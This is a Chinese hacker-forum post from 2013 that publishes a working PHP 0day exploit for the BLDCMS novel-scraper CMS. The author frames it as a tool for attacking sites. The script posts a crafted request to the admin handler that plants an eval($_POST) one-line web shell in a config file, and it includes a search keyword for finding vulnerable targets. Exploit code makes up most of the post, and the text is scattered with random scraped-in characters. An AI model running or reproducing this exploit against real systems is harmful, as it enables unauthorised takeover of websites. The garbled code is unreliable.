之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞: i/ Y; r" D4 d( k! I' {
$ Y- d7 d) g, O) u- Z* @! C" n+ } U9 P" {+ y- ]6 s8 e; w
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 + |% J( E5 A2 U: L, D
) f; j- I0 C b" K! {既然都有人发了 我就把我之前写好的EXP放出来吧
0 @& j' ^+ v" S" j4 r 9 `8 g' n1 D+ X' ]0 A h9 W7 T
view source print?01.php;">0 j. ]& b& n5 I& o6 t! A
02.<!--?php3 h3 f: U$ l! {9 [
03.echo "-------------------------------------------------------------------" ^1 f* s+ d1 K" o6 ~* H
04.
8 m k8 ^1 ]* X4 c! V# f6 a6 {05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP5 p& l/ N/ v! A# O% S! m
06. 0 [# }( f( h2 ?2 O, M
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun8 c! W5 f! A) X/ ~( l
08.
# f3 _. i" {, v1 J: s09.QQ:981009941\r\n 2013.3.21\r\n
. t# i5 v. B9 d5 c9 v& V1 ^10. ! G, {; u6 g: e, g
11. & Z& ?2 `) `$ R1 h% A/ c5 O
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
! G! s! j9 B( c8 u3 u13. [; l" \5 f$ G: o9 O6 ?$ O
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
. W# m D2 w( j7 H15. 2 S) ?0 g% J0 y1 l* V% V) _9 u* P
16.--------------------------------------------------------------------\r\n";
0 e5 ^1 e+ ]$ ^5 @, ?. T5 `6 A8 r ?17.$url=$argv[1];
) S. a4 e$ \' p& p" Y18.$dir=$argv[2];
1 E# G. Y- e! P4 t& q6 U' b19.$pass=$argv[3];
0 z; k! U: X4 q1 U; v/ T20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
1 R/ H- m* d# b2 c+ }( F21.if (emptyempty($pass)||emptyempty($url)) G' Y# S8 m- j3 B
22.{exit("请输入参数");}" g1 m$ [# n1 V6 h
23.else
, |$ r2 f7 x/ S' p- o3 _+ ?$ `24.{
/ X7 |# a* d) G9 _' }5 A25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
" A' ^5 `$ |5 V: `# N. i26.
7 S4 b9 Y% V3 h, b' }27.al;
! X' T7 x' {4 A$ N0 i28.$length = strlen($fuckdata);
/ }) ] a' l, A, Z# j2 c: Q29.function getshell($url,$pass)
6 o/ u5 _. |- ]; w* v" o$ I# [30.{
; ]3 G0 h/ a( [- y/ m31.global $url,$dir,$pass,$eval,$length,$fuckdata;. F. s* ^% V9 l) p$ F' x& f
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
$ A% r2 J: J7 v! w33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
; a" L- V# g$ m2 p+ K34.$header .= "User-Agent: MSIE\r\n";" _& H& ]! g3 F
35.$header .= "Host:".$url."\r\n";* ^/ z4 Z! }. b
36.$header .= "Content-Length: ".$length."\r\n";
& ^1 F" t8 [4 @) i; T/ H37.$header .= "Connection: Close\r\n";" z( k3 Q" A, K( l E$ ?
38.$header .="\r\n";1 F9 N- c* E6 `( s1 K/ M) L
39.$header .= $fuckdata."\r\n\r\n";
' {$ J3 x5 m' Q* P X- q* T; G7 n40.$fp = fsockopen($url, 80,$errno,$errstr,15);
! |6 @; T+ }6 j2 }41.if (!$fp)
/ S: ?: B$ `5 N42.{
" C( f5 g1 U M: R. @/ q6 E43.exit ("利用失败:请检查指定目标是否能正常打开");
/ J1 \1 G( N; y% @( r1 }44.}3 h9 J' Y" m! h$ j: S3 f2 [6 E
45.else{ if (!fputs($fp,$header))" P8 o' J, n, D. e) n) q! x
46.{exit ("利用失败");}
7 m B7 `4 Q, }& @7 o' ^0 l9 M47.else$ t' f; q$ y/ }5 L
48.{; z8 G$ [0 N' }
49.$receive = '';9 _) i# B9 S* z( s- j+ w" S9 T. ^
50.while (!feof($fp)) {1 K, F8 j l* p3 W/ M, o. G
51.$receive .= @fgets($fp, 1000);
; }& i* C4 U- U9 K52.}, P$ T& O4 g) B
53.@fclose($fp);( V9 l! ^/ H$ F2 r; A: O3 i
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标. p1 \) V3 |+ ?, w) n1 a
55. + h$ `4 p L1 Z( c) X
56.GPC是否=off)";$ H6 i! f, D# i f1 d
57.}}* o3 Y" K; \1 Q5 w: y
58.}7 h P$ u+ a% D8 U
59.}+ A' k: c) {. t b. d9 d" x
60.getshell($url,$pass);
6 H8 O! Y4 T6 `# p3 E61.?-->
% D% A6 n% a- O8 }* @1 b! y
7 @, [4 `+ ]: h V: p2 T1 a; F5 m
# B, E6 }8 T* O, w. k
' O+ e0 q4 O5 [4 K kby 数据流* z7 ?0 ?% @; r
|
发表于 2013-3-26 20:49:10
收藏
支持
反对